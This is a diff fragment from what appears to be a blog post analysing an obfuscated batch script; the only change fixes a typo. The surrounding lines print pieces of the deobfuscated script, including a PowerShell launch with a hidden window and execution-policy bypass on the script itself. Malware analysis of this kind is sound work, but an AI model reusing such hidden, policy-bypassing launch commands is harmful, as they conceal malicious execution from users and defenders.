khaansec/khaansec.github.io/_posts/2025-04-24-Batch-Script-Obfuscation.md

 !bhunjibhunjibhunjibhunjibhunji! "ckgMzaltivLxuGAeCevHMWWHEdYyKliYXvbInLefrxEmnhjvzletlABeTtxDfCRNHZEDcZpGxHioaPbbHebBYQXCZdICsBNzMFcpjRABMdjjcBhBWPfScDsKoNuCAcJGRlPirXRNXderAmpuF="%systemdrive%\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "
 ~~~

-After som trial and error, and with the help of ChatGPT to guess some of the names, this is what i landed on
+After some trial and error, and with the help of ChatGPT to guess some of the names, this is what i landed on

 ~~~
 !delayed_var_2! "profile_var=-noprofile -windowstyle hidden -ep bypass -command $command = '%~f0';